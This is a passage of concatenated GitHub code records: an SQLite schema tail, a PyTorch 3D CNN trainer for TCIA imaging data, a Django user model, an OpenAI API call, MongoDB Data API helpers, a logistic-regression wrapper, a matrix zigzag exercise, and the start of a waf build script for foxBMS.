Lookup\nc.execute(\"CREATE TABLE import_export_lookup \\\n\t(input_item_id INTEGER FOREIGN_KEY REFERENCES input_items(input_item_id),\\\n \t export_item_id INTEGER FOREIGN_KEY REFERENCES export_items(export_item_id),\\\n\t input_coefficient REAL NOT NULL)\")\n\n#save database\nconn.commit()\nconn.close()","repo_name":"RMGProjects/Import_License_Digitization","sub_path":"DataBase/SQL_Build_Backend.py","file_name":"SQL_Build_Backend.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43217027218","text":"import os\nimport pdb\nimport sys\nimport copy\nimport json\nimport time\nimport uuid\nimport pickle\n\nimport h5py\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lrs\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\n\nIMG_TYPES = [\"adc\", \"bval\", \"ktrans\"]\nPATH = None\nHLEN = 106\n\n#TRAIN_LOADER = TEST_LOADER = CLASSES = None\nnp.random.seed(1337)\ntorch.manual_seed(7331)\n\nNO_EPOCHS = 40\nBATCH_SIZE = 64\nLR = 0.001\nMOM = 0.9\nDROPOUT_RATE = 0.20\nLOSSFUNC = nn.CrossEntropyLoss()\nLOSS_NAME = \"CrossEntropy\"\n\nOPTIM_NAME = \"ADAM\"\nget_optimizer = lambda param: optim.Adam( param, lr = LR, weight_decay = 0.005)\nget_scheduler = lambda opt: lrs.ReduceLROnPlateau(opt, 'min', factor = 0.5, patience = 3, min_lr = 0.0001, verbose = True) if opt is not None else None\n\nclass pcNN3D(nn.Module):\n def __init__(self):\n super(pcNN3D, self).__init__()\n self.epochs_trained = 0\n self.set_layers()\n\n\n def set_layers(self):\n \"\"\"\n Conv/Poll -> Dropout -> BN -> Activation\n \"\"\"\n # Convolutions\n self.layer1 = nn.Sequential(\n nn.Conv3d(3,4,(1,3,3)),\n nn.InstanceNorm3d(4),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer2 = nn.Sequential(\n nn.Conv3d(4,4,(3,3,3)),\n nn.InstanceNorm3d(4),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer3 = nn.Sequential(\n nn.Conv3d(4,8,(1,3,3)),\n nn.InstanceNorm3d(8),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer4 = nn.Sequential(\n nn.Conv3d(8,8,(3,3,3)),\n nn.InstanceNorm3d(8),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer5 = nn.Sequential(\n nn.MaxPool3d((1,2,2)),\n nn.InstanceNorm3d(8),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer6 = nn.Sequential(\n nn.Conv3d(8,16,(1,3,3)),\n nn.InstanceNorm3d(16),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer7 = nn.Sequential(\n nn.Conv3d(16,16,(3,3,3)),\n nn.InstanceNorm3d(16),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer8 = nn.Sequential(\n nn.Conv3d(16,32,(1,3,3)),\n nn.InstanceNorm3d(32),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer9 = nn.Sequential(\n nn.Conv3d(32,32,(3,3,3)),\n nn.InstanceNorm3d(32),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer10 = nn.Sequential(\n nn.Conv3d(32,64,(3,3,3)),\n nn.InstanceNorm3d(64),\n nn.ReLU(),\n nn.Dropout(p = DROPOUT_RATE)\n )\n\n self.layer11Dense = nn.Sequential(\n nn.Linear(512, 192),\n nn.ReLU()\n )\n self.layer12Dense = nn.Sequential(\n nn.Linear(192, 90),\n nn.ReLU()\n )\n self.layer13Dense = nn.Sequential(\n nn.Linear(90, 2),\n nn.Softmax()\n )\n\n\n def set_info(self, optimzer_name, lossfunc_name):\n self.optimizer = optimzer_name\n self.lossfunc = lossfunc_name\n self.train_loss = np.inf\n self.valid_loss = np.inf\n self.test_loss = np.inf\n self.train_pct = 0\n self.valid_pct = 0\n self.test_pct = 0\n self.total_time = 0\n\n\n def forward(self, batch):\n x = self.layer1(batch)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n x = self.layer5(x)\n x = self.layer6(x)\n x = self.layer7(x)\n x = self.layer8(x)\n x = self.layer9(x)\n x = self.layer10(x)\n x = x.view(-1, 512)\n x = self.layer11Dense(x)\n x = self.layer12Dense(x)\n x = self.layer13Dense(x)\n #pdb.set_trace()\n return x\n\n\nclass TCIADataset(Dataset):\n def __init__(self, root, transform):\n self.root = root\n self.transform = transform\n\n self.h5 = None\n self.keys = None\n self.classes = None\n self.img_types = None\n self.load_file_keys()\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, idx):\n name, label = self.keys[idx]\n paths = [\"/\" + \"/\".join([label,it,name]) for it in self.img_types]\n arrs = [self.h5[path][:] for path in paths]\n arr = torch.FloatTensor(arrs).transpose(1,3)\n label = self.classes.index(label)\n return arr, label\n\n def load_file_keys(self):\n self.h5 = h5py.File(self.root, 'r')\n\n # Get Classes\n h5path = '/'\n self.classes = [ key for key in self.h5[h5path].keys()]\n\n # Get Image Types\n h5path += self.classes[0]\n self.img_types = IMG_TYPES#[ key for key in self.h5[h5path].keys()]\n\n # Get File names\n h5path += \"/\" + self.img_types[0]\n names = [ key for key in self.h5[h5path].keys()]\n self.keys = [ (name, label) for name in names for label in self.classes ]\n\n self.split_train_valid()\n\n return\n\n def split_train_valid(self, pct = 30):\n self.k = int(len(self.keys) * pct / 100.)\n self.keys = np.random.permutation(self.keys).tolist()\n return\n\n\ndef build_loaders(data_dir, batch_size):\n \"\"\"get train and test data \"\"\"\n\n print_border()\n print_header(\"Building dataloaders for {0} images\".format(\", \".join(IMG_TYPES)))\n\n classes = (\"POS\", \"NEG\")\n\n train_root = data_dir + \"/traindata/volumes/train.h5\"\n test_root = data_dir + \"/testdata/volumes/test.h5\"\n transform = None\n trainset = TCIADataset(train_root, transform)\n validset = TCIADataset(train_root, transform)\n # Split into train and validation set\n validset.keys = trainset.keys[-trainset.k:]\n trainset.keys = trainset.keys[:-trainset.k]\n #pdb.set_trace()\n testset = TCIADataset(test_root, transform)\n\n train_loader = torch.utils.data.DataLoader(trainset,\n batch_size = batch_size,\n shuffle = True,\n num_workers = 0)\n\n valid_loader = torch.utils.data.DataLoader(validset,\n batch_size = batch_size,\n shuffle = True,\n num_workers = 0)\n\n test_loader = torch.utils.data.DataLoader(testset,\n batch_size = batch_size,\n shuffle = True,\n num_workers = 0)\n\n print_header(\"Dataloaders Ready!\")\n print_border()\n\n return train_loader, valid_loader, test_loader, classes\n\n\ndef l2_regularization(net, loss, gamma = 0.005):\n li_reg_loss = 0\n for m in net.modules():\n if isinstance(m,nn.Linear):\n temp_loss = torch.sum(((torch.sum(((m.weight.data)**2),1))**0.5),0)\n li_reg_loss += temp_loss\n\n loss += Variable(gamma * li_reg_loss, requires_grad= True)\n return loss\n\n\ndef training(net, optimizer, lossfunc, number_of_epochs = 1, scheduler = None):\n \"\"\" Train a NN for n epochs\"\"\"\n #global TRAIN_LOADER, TEST_LOADER\n if number_of_epochs == 0:\n return np.inf, np.inf\n\n print_border()\n print_header(\"Training\")\n print_border()\n\n #pdb.set_trace()\n print( '{0:<10s}\\t{1:>10s}\\t{2:>10s}\\t{3:>10s}\\t{4:>10s}\\t{5:>10s}\\t{6:>10s}'\n .format( 'Epoch', 'Batch#', 'Loss Train' , 'Loss Valid', 'pct Train', 'pct Valid', 'Time') )\n\n total_time = net.total_time\n for epoch in range(number_of_epochs):\n start_time = time.time()\n running_loss = 0.0\n correct_count = 0\n total_count = 0\n net.train()\n for j, train_batch in enumerate(TRAIN_LOADER, 0):\n inputs, labels = train_batch[0], train_batch[1]\n inputs, labels = Variable(inputs), Variable(labels)\n\n optimizer.zero_grad()\n result = net(inputs)\n loss = lossfunc(result, labels)\n\n corr, total = count_correct(result.data.numpy(), labels.data.numpy())\n correct_count += corr\n total_count += total\n train_pct = correct_count / total_count\n\n loss.backward()\n optimizer.step()\n\n running_loss += loss.data[0]\n\n if (j + 1) % 128 == 0:\n temp_time = time.time() - start_time\n print('{0:>10d}\\t{1:>10d}\\t{2:>10.5f}\\t{3:>10s}\\t{4:>10.5f}\\t{5:>10s}\\t{6:>10.5f}'\n .format( epoch + 1, j + 1, running_loss / (j + 1), \"\", train_pct, \"\", temp_time))\n else:\n print('{0:<10s}\\t{1:>10d}'.format( \"Training\", j + 1), end = \"\\r\", flush = True)\n\n temp_time = time.time() - start_time\n print('{0:>10d}\\t{1:>10d}\\t{2:>10.5f}\\t{3:>10s}\\t{4:>10.5f}\\t{5:>10s}\\t{6:>10.5f}'\n .format( epoch + 1, j + 1, running_loss / (j + 1), \"\", train_pct, \"\", temp_time))\n\n train_loss = running_loss / (j + 1)\n net.train_loss = train_loss\n net.train_pct = train_pct\n\n valid_loss, valid_pct = validation(net, lossfunc, VALID_LOADER)\n net.valid_loss = valid_loss\n net.valid_pct = valid_pct\n\n net.epochs_trained += 1\n etime = time.time() - start_time\n total_time += etime\n print('{0:<10s}\\t{1:<10s}\\t{2:>10.5f}\\t{3:>10.5f}\\t{4:>10.5f}\\t{5:>10.5f}\\t{6:>10.5f}'\n .format( \"Results\", \"\", net.train_loss, net.valid_loss, net.train_pct, net.valid_pct, etime))\n\n print_border()\n print( '{0:<10s}\\t{1:>10s}\\t{2:>10s}\\t{3:>10s}\\t{4:>10s}\\t{5:>10s}\\t{6:>10s}'\n .format( 'Epoch', 'Batch#', 'Loss Train' , 'Loss Valid', 'pct Train', 'pct Valid', 'Time') )\n\n if net.train_pct > 0.90 and net.valid_pct > 0.90:\n print_border()\n print_header(\"!!!Early termination!!!\")\n break\n\n # Adjusting Learning rate\n if scheduler is not None:\n scheduler.step(valid_loss)\n\n print_border()\n print_header(\"Total Training Time :{0:1.9f}\".format(total_time))\n print_border()\n net.total_time += total_time\n\n print_border()\n print_header(\"TESTING\")\n test_loss, test_pct = validation(net, lossfunc, TEST_LOADER, 'testing')\n print_header(\"TEST LOSS {0:5.4f}, TEST PCT {1:5.4f}\".format(test_loss, test_pct))\n print_border()\n net.test_loss = test_loss\n net.test_pct = test_pct\n\n save_net_info(net, optimizer, lossfunc)\n\n return net\n\n\ndef validation(net, lossfunc, loader, loader_type = 'validating'):\n \"\"\" Loop of test data and compute test loss\"\"\"\n net.eval()\n valid_loss = 0.0\n start_time = time.time()\n correct_count, total_count = 0, 0\n for j, test_batch in enumerate(loader, 0):\n inputs, labels = test_batch[0], test_batch[1]\n inputs, labels = Variable(inputs), Variable(labels)\n result = net(inputs)\n\n corr, total = count_correct(result.data.numpy(), labels.data.numpy())\n correct_count += corr\n total_count += total\n\n valid_loss += lossfunc(result, labels).data[0]\n\n print('{0:<10s}\\t{1:>10d}\\t{2:>10.5f}'.format( loader_type, j + 1, net.train_loss), end = \"\\r\", flush = True)\n\n valid_loss = valid_loss / (j + 1)\n valid_pct = correct_count / total_count\n\n return valid_loss, valid_pct\n\n\ndef count_correct(res, lab):\n res = np.argmax(res, axis = 1)\n corr = np.sum(res == lab)\n count = len(res)\n return corr, count\n\n\ndef save_net_info(net, optimizer, lossfunc):\n path = os.path.realpath(PATH+\"/../../\")\n with open(path + \"/top5_info.json\",'r') as jsoninfo:\n top_info = json.load(jsoninfo)\n pdb.set_trace()\n compare = [net.valid_loss < top_loss for top_loss in top_info['top_5_valid_loss']]\n\n print_border()\n if any(compare):\n net_name = str(uuid.uuid4()).split(\"-\")[-1]\n rank = 6 - sum(compare)\n\n print_header(\"Neural Net ranked {0:d}\".format(rank))\n print_header(\"Saving net, optimizer, loss function and information\")\n\n net_results = {\n \"net_name\" : net_name ,\n \"rank\" : rank,\n \"net_parameters\" : str(net),\n \"train_loss\" : net.train_loss,\n \"test_loss\" : net.test_loss,\n \"valid_loss\" : net.valid_loss,\n \"train_pct\" : net.train_pct,\n \"test_pct\" : net.test_pct,\n \"valid_pct\" : net.test_pct,\n \"train_time\" : net.total_time,\n \"optimizer_name\" : net.optimizer,\n \"optimizer_info\" : None,\n \"lossfunc_name\" : net.lossfunc,\n \"lossfunc_info\" : dict(lossfunc.state_dict())\n }\n try:\n net_results['optimizer_info'] = dict(optimizer.state_dict())[\"param_groups\"]\n net_results['lossfunc_info'] = dict(lossfunc.state_dict())[\"param_groups\"]\n except:\n pass\n\n top_info['top_5_valid_loss'].insert(rank - 1, net.valid_loss)\n top_info['top_5_train_loss'].insert(rank - 1, net.train_loss)\n top_info['info'].insert(rank - 1, net_results)\n\n top_info['top_5_valid_loss'].pop(-1)\n top_info['top_5_train_loss'].pop(-1)\n old = top_info['info'].pop(-1)\n\n # Create dir move old\n os.mkdir( path + \"/nets/\" + net_name)\n cpcall = \"cp %s/pcNN3D.py %s\" % (path + \"/src\", path + \"/nets/\" + net_name + \"/\")\n os.system(cpcall)\n\n movecall = \"mv %s/ %s\" % (path + \"/nets/\" + old['net_name'],\n path + \"/nets/old\" )\n os.system(movecall)\n\n filename = path + \"/nets/\" + net_name + \"/pcNN3D.pk\"\n with open(filename, 'wb') as NNBinary:\n pickle.dump(net, NNBinary)\n\n filename = path + \"/nets/\" + net_name + \"/optimizer.pk\"\n with open(filename, 'wb') as optimizerBinary:\n pickle.dump(optimizer, optimizerBinary)\n\n filename = path + \"/nets/\" + net_name + \"/lossfunc.pk\"\n with open(filename, 'wb') as lossfuncBinary:\n pickle.dump(lossfunc, lossfuncBinary)\n\n filename = path + \"/nets/\" + net_name + \"/info.json\"\n with open(filename,'w') as jsoninfo:\n json.dump(net_results, jsoninfo, indent=2)\n\n # update top five info\n filename = path + \"/top5_info.json\"\n with open(filename, 'w') as jsoninfo:\n json.dump(top_info, jsoninfo, indent=2)\n\n print_header(\"Files saved in folder {0:s}\".format(net_name))\n print_border()\n\n else:\n print_header(\"Neural Net did not rank in top 5\")\n print_border()\n\n return\n\n\ndef print_header(header):\n prl = (HLEN//2-len(header)//2) - 1\n prr = HLEN - prl - len(header) - 2\n print(\"#\" + \" \"*prl + header + \" \"*prr + \"#\")\n return\n\n\ndef print_border():\n print(\"-\"*HLEN)\n return\n\n\ndef load_net(dirname):\n \"\"\" Load pretrained Neural Net From Binary file\"\"\"\n path = os.path.realpath(PATH+\"/../../nets/\"+dirname)\n with open(path + \"/pcNN.pk\", 'rb') as NNBinary:\n net = pickle.load(NNBinary)\n with open(path + \"/optimizer.pk\", 'rb') as optimizerBinary:\n optimizer = pickle.load(optimizerBinary)\n with open(path + \"/lossfunc.pk\", 'rb') as lossfuncBinary:\n lossfunc = pickle.load(lossfuncBinary)\n\n return net, optimizer, lossfunc\n\n\ndef load_ranked_n(n = 1):\n \"\"\" Loads the neural network ranked n\"\"\"\n if n < 1 or n > 5:\n print(\"Only storing top 5\")\n return None, None, None\n\n path = os.path.realpath(PATH+\"/../../\")\n with open(path + \"/top5_info.json\",'r') as jsoninfo:\n top_info = json.load(jsoninfo)\n\n dirname = top_info['info'][n - 1][\"net_name\"]\n net, optimizer, lossfunc = load_net(dirname)\n\n return net, optimizer, lossfunc\n\n\nif __name__ == '__main__':\n PATH = os.path.realpath(sys.argv[0])\n data_dir = PATH.rstrip('src/pcNN3D.py')\n\n net = pcNN3D()\n net.set_info(LOSS_NAME, OPTIM_NAME)\n\n TRAIN_LOADER, VALID_LOADER, TEST_LOADER, CLASSES = build_loaders(data_dir, BATCH_SIZE)\n\n OPTIMIZER = get_optimizer( net.parameters() )\n SCHEDULER = get_scheduler(OPTIMIZER)\n\n net = training(net, OPTIMIZER, LOSSFUNC, NO_EPOCHS, SCHEDULER)\n #gen = enumerate(VALID_LOADER)\n #inp = next(gen)\n #inp = Variable(inp[1][0])\n #res = net(inp)\n #net.eval()\n #res2 = net(inp)\n #save_net_info(net, optimizer, lossfunc)\n #net1, optimizer1, lossfunc1 = load_ranked_n(1)\n","repo_name":"mortenvester1/tcia-challenge","sub_path":"src/pcNN3D.py","file_name":"pcNN3D.py","file_ext":"py","file_size_in_byte":16776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35652440559","text":"from django.db import models\n\n# Create your models here.\n\n\nclass Lifanguser(models.Model):\n \n email = models.EmailField(max_length=128,\n verbose_name='사용자 이메일')\n \n password = models.CharField(max_length=128,\n verbose_name='비밀번호')\n \n level = models.CharField(max_length=64,\n verbose_name='등급',\n choices={\n ('admin', 'admin'),\n ('user', 'user'),\n \n \n })\n \n \n registered_dttm = models.DateTimeField(auto_now_add=True,\n verbose_name='등록시간')\n \n def __str__(self):\n return self.email\n \n \n class Meta:\n db_table = 'lifang_django_lifanguser'\n verbose_name = '사용자'\n verbose_name_plural = '사용자'\n ","repo_name":"swavepark1/lifangdjango","sub_path":"lifanguser/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28885172504","text":"import os\nimport openai\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\nresponse = openai.Completion.create(\n engine=\"davinci\",\n prompt=\"Back to Future: 👨👴🚗🕒\\nBatman: 🤵🦇\\nTransformers: 🚗🤖\\nWonder Woman: 👸🏻👸🏼👸🏽👸🏾👸🏿\\nWinnie the Pooh: 🐻🐼🐻\\nThe Godfather: 👨👩👧🕵🏻‍♂️👲💥\\nGame of Thrones: 🏹🗡🗡🏹\\nSpider-Man:\",\n temperature=0.8,\n max_tokens=60,\n top_p=1.0,\n frequency_penalty=0.0,\n presence_penalty=0.0,\n stop=[\"\\n\"]\n)","repo_name":"shoblo/1111tenp","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17591686412","text":"\"\"\"\nMongoDB database APIs.\n\"\"\"\nimport copy\nfrom typing import Dict, List, Any\nimport requests\nfrom . import settings\n\n\ndef create_session() -> requests.Session:\n \"\"\"Create a session with the API header.\n\n Returns:\n requests.Session: Session with the API header.\n \"\"\"\n session = requests.Session()\n session.headers.update(settings.HEADERS)\n return session\n\n# let's create our own API function to insert one recipe\n\n\ndef insert_one(recipe: Dict[str, Any]) -> 'requests.Response':\n \"\"\"Insert one recipe into the database.\n\n Args:\n recipe (Dict[str, Any]): Recipe to insert.\n\n Returns:\n requests.Response: Response from the API.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/insertOne'\n print(action)\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['document'] = recipe\n response = session.post(action, json=payload)\n return response\n\n\ndef insert_many(recipes: List[Dict[str, Any]]) -> 'requests.Response':\n \"\"\"Insert many recipes into the database.\n\n Args:\n recipes (List[Dict[str, Any]]): Recipes to insert.\n\n Returns:\n requests.Response: Response from the API.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/insertMany'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['documents'] = recipes\n response = session.post(action, json=payload)\n return response\n\n\ndef find_one(query: Dict[str, Any]) -> Any:\n \"\"\"Find one recipe.\n\n Args:\n query (Dict[str, Any]): filter for find_one API.\n\n Returns:\n Any: Recipe.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/findOne'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['filter'] = query\n response = session.post(action, json=payload)\n return response.json()\n\n\ndef find_all(query: Dict[str, Any]) -> Any:\n \"\"\"Find all recipes.\n\n Args:\n query (Dict[str, Any]): filter for find_all API.\n\n Returns:\n Any: Recipes.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/find'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['filter'] = query\n response = session.post(action, json=payload)\n return response.json()\n\n\ndef delete_one(query: Dict[str, Any]) -> Any:\n \"\"\"Delete one recipe.\n\n Args:\n query (Dict[str, Any]): filter for delete_one API.\n\n Returns:\n Any: Response from the API.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/deleteOne'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['filter'] = query\n response = session.post(action, json=payload)\n return response.json()\n\n\ndef update_one(query: Dict[str, Any], update: Dict[str, Any]) -> Any:\n \"\"\"Update one recipe.\n\n Args:\n query (Dict[str, Any]): filter for update_one API.\n update (Dict[str, Any]): update for update_one API.\n\n Returns:\n Any: Response from the API.\n \"\"\"\n session = create_session()\n action = f'{settings.END_POINT}/updateOne'\n payload: Dict[str, Any] = copy.deepcopy(settings.PAYLOAD)\n payload['filter'] = query\n payload['update'] = update\n response = session.post(action, json=payload)\n return response.json()\n","repo_name":"rambasnet/flask-docker-mongo-heroku","sub_path":"app/db_api.py","file_name":"db_api.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24839818629","text":"import string\nimport argparse\n# import data\nimport math\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import preprocessing\nimport numpy as np\nfrom warnings import simplefilter\n\nsimplefilter(action='ignore', category=FutureWarning)\n\n\nclass Learner:\n\n def __init__(self):\n self.X_train = []\n self.Y_train = []\n self.X_test = []\n self.X_train_counts = []\n self.clf = LogisticRegression()\n self.predicted_labels = []\n\n def train(self, X_vals, Y_vals):\n for sample in X_vals:\n self.X_train.append(sample)\n for tag in Y_vals:\n self.Y_train.append(tag)\n\n print(\"Training model...\\n\")\n\n # self. X_train_counts = scaler.fit_transform(X_train_counts)\n self.clf.fit(self.X_train, self.Y_train) # trains the model using gradient descent\n\n print(\"Model successfully trained. \\n\")\n\n def test(self, X_vals, Y_vals):\n for sample in X_vals:\n self.X_test.append(sample)\n\n print(\"Testing accuracy with labeled dataset. \\n\")\n\n self.predicted_labels = self.clf.predict(self.X_test)\n\n correct = 0\n count = 0\n for i, tag in enumerate(Y_vals):\n if tag == self.predicted_labels[i]:\n correct += 1\n count += 1\n percent = (correct / count) * 100\n print(\"Model rated with a\", percent, \"% accuracy rate. \\n\")\n\n\n'''\nl = Learner()\nl.train([ [0,1,2,3], [0,1,3,4], [0,1,2,8] ], ['a', 'b', 'e'] )\nl.test([ [0,5,2,3], [4,1,3,4], [0,0,2,8] ], ['a', 'b', 'b'] )\n'''\n","repo_name":"JPsquared/Autonomous-Threat-Hunting","sub_path":"learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36326524878","text":"# Homework Problem 1 (Level: Medium)\n# Print a 2D array in Diagonal ZigZag order.\n# For example,Input:1 2 3 4 5 6 7 8 9 0 1 2\n# Output:1 2 5 9 6 3 4 7 0 1 8 2\n\n\ndef diagonal_zigzag_print(matrix):\n rows = len(matrix)\n cols = len(matrix[0])\n curr_col = curr_row = 0\n res = []\n going_up = True\n\n\n while len(res) != cols * rows:\n if going_up:\n while curr_col < cols and curr_row >= 0:\n res.append(matrix[curr_row][curr_col])\n curr_row -= 1\n curr_col += 1\n if curr_col >= cols:\n curr_row += 2\n curr_col -= 1 \n else:\n curr_row += 1\n going_up = False\n else:\n while curr_row < rows and curr_col >= 0:\n res.append(matrix[curr_row][curr_col])\n curr_row += 1\n curr_col -= 1\n if curr_row == rows:\n curr_row -= 1\n curr_col += 2\n else:\n curr_col += 1 \n going_up = True\n\n return res\n\n# -------- TEST CASE --------\nmatrix = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 0, 1, 2]\n]\n\n# output should be [1, 2, 5, 9, 6, 3, 4, 7, 0, 1, 8, 2]\nprint(diagonal_zigzag_print(matrix))\n# output should be [1,2,4,7,5,3,6,8,9]\nprint(diagonal_zigzag_print([[1,2,3],[4,5,6],[7,8,9]]) )\n# output should be [1,2,3,4]\nprint(diagonal_zigzag_print([[1,2],[3,4]]) )\n\n# -------- WORKING SOLUTION --------\n\n# def diagonal_zigzag_print(matrix):\n# rows = len(matrix)\n# cols = len(matrix[0])\n# res = []\n# # starting position at 0,0\n# curr_row = curr_col = 0\n# going_up = True\n\n# while len(res) != rows * cols :\n# if going_up:\n# while curr_row >= 0 and curr_col < cols:\n# res.append(matrix[curr_row][curr_col])\n\n# curr_row -= 1\n# curr_col += 1\n \n# if curr_col == cols:\n# curr_col -=1\n# curr_row += 2\n# else:\n# curr_row += 1\n# going_up = False\n# else:\n# while curr_row < rows and curr_col >= 0 :\n# res.append(matrix[curr_row][curr_col])\n\n# curr_col -= 1\n# curr_row += 1\n\n# if curr_row == rows:\n# curr_col += 2\n# curr_row -=1 \n# else:\n# curr_col += 1\n# going_up = True\n \n# return res\n","repo_name":"shin101/interview-camp","sub_path":"12. Arrays and Strings II/2D_Arrays_1.py","file_name":"2D_Arrays_1.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35121092927","text":"import os\nimport sys\nimport datetime\nimport posixpath\nimport re\nimport yaml\nimport jinja2\n# try to use FullLoader (PyYAML5.1+ and fall back to normale Loader)\ntry:\n from yaml import FullLoader as YAMLLoader\nexcept ImportError:\n from yaml import Loader as YAMLLoader\n\nfrom waflib import Utils, Options, Errors, Logs\nfrom waflib import Task, TaskGen\nfrom waflib.Tools.compiler_c import c_compiler\nfrom waflib.Tools.c import c\nfrom waflib.Tools import c_preproc\n\n\n# overwrite c task to use absolute paths for the input file\nclass c(Task.Task): # noqa: F811\n run_str = '${CC} ${ARCH_ST:ARCH} ${CFLAGS} ${FRAMEWORKPATH_ST:FRAMEWORKPATH} ${CPPPATH_ST:INCPATHS} ${DEFINES_ST:DEFINES} ${CC_SRC_F}${SRC[0].abspath()} ${CC_TGT_F}${TGT[0].abspath()} ${CPPFLAGS}'\n vars = ['CCDEPS']\n ext_in = ['.h']\n scan = c_preproc.scan\n\n\nout = 'build'\nvariants = ['primary', 'secondary', 'libs', 'primary_bare', 'secondary_bare']\nfrom waflib.Build import BuildContext, CleanContext, ListContext, StepContext # noqa: E402\nfor x in variants:\n for y in (BuildContext,\n CleanContext,\n ListContext,\n StepContext):\n name = y.__name__.replace('Context', '').lower()\n\n class tmp_1(y):\n if name == 'build':\n __doc__ = '''executes the {} of {}'''.format(name, x)\n elif name == 'clean':\n __doc__ = '''cleans the project {}'''.format(x)\n elif name == 'list':\n __doc__ = '''lists the targets to execute for {}'''.format(x)\n elif name == 'step':\n __doc__ = '''executes tasks in a step-by-step fashion, ''' \\\n '''for debugging of {}'''.format(x)\n cmd = name + '_' + x\n variant = x\n\n dox = 'doxygen'\n\n class tmp_2(BuildContext):\n __doc__ = '''creates the {} documentation of {}'''.format(dox, x)\n cmd = dox + '_' + x\n fun = dox\n variant = x\n\n\ndef options(opt):\n opt.load('compiler_c')\n opt.load('python')\n opt.load(['doxygen', 'sphinx_build', 'cpplint', 'flake8', 'cppcheck'],\n tooldir=os.path.join('tools', 'waftools'))\n opt.add_option('-t', '--target', action='store', default='debug',\n help='build target: debug (default)/release', dest='target')\n opt.add_option('-l', '--libs', action='store', default='',\n help='name of the library to be used')\n for k in ('--targets',\n '--out',\n '--top',\n '--prefix',\n '--destdir',\n '--bindir',\n '--libdir',\n '--msvc_version',\n '--msvc_targets',\n '--no-msvc-lazy',\n '--force',\n '--check-c-compiler'):\n option = opt.parser.get_option(k)\n if option:\n opt.parser.remove_option(k)\n\n mctx = waflib.Context.classes\n mctx.remove(waflib.Build.InstallContext)\n mctx.remove(waflib.Build.UninstallContext)\n\n\ndef configure(conf):\n if ' ' in conf.path.abspath():\n conf.fatal(f'path to foxbms must not contain spaces'\n f' (current path: {conf.path.abspath()}).')\n\n conf.load('python')\n conf.check_python_version((3, 6))\n\n # Setup the whole toolchain (compiler, interpreter etc.)\n print('Compiler toolchain:')\n pref = 'arm-none-eabi-' # prefix for all gcc related tools\n exe_extension = ''\n if sys.platform.startswith('win'):\n conf.env.jinja2_newline = '\\r\\n'\n exe_extension = '.exe'\n else:\n conf.env.jinja2_newline = '\\n'\n conf.env.CC = pref + 'gcc' + exe_extension\n conf.env.AR = pref + 'ar' + exe_extension\n conf.env.LINK_CC = pref + 'g++' + exe_extension\n gcc_tools = 'cpp ranlib as strip objcopy objdump size gdb'.split()\n for k in reversed(sorted(gcc_tools, key=len)):\n conf.find_program(pref + k, var=k.upper(), mandatory=True)\n for key in c_compiler: # force only using gcc\n c_compiler[key] = ['gcc']\n conf.load('compiler_c')\n conf.load(['doxygen', 'sphinx_build', 'cpplint', 'flake8', 'cppcheck'])\n print('General tools:')\n conf.find_program('python', var='PYTHON', mandatory=True)\n conf.find_program('git', var='GIT', mandatory=False)\n\n # define configuration files etc.\n # parsing the version info based on the general documentation\n conf.env.sphinx_doc_dir = os.path.join('documentation', 'sphinx')\n to_posix = (conf.env.sphinx_doc_dir).split(os.sep)\n conf.env.sphinx_doc_dir_posix = posixpath.join(*(to_posix))\n conf.env.sphinx_conf_path = os.path.join(conf.env.sphinx_doc_dir,\n 'conf.py')\n version_info_file = os.path.join(conf.env.sphinx_doc_dir, 'macros.rst')\n with open(version_info_file, 'r', encoding='UTF-8') as f:\n txt = f.read()\n rgx = 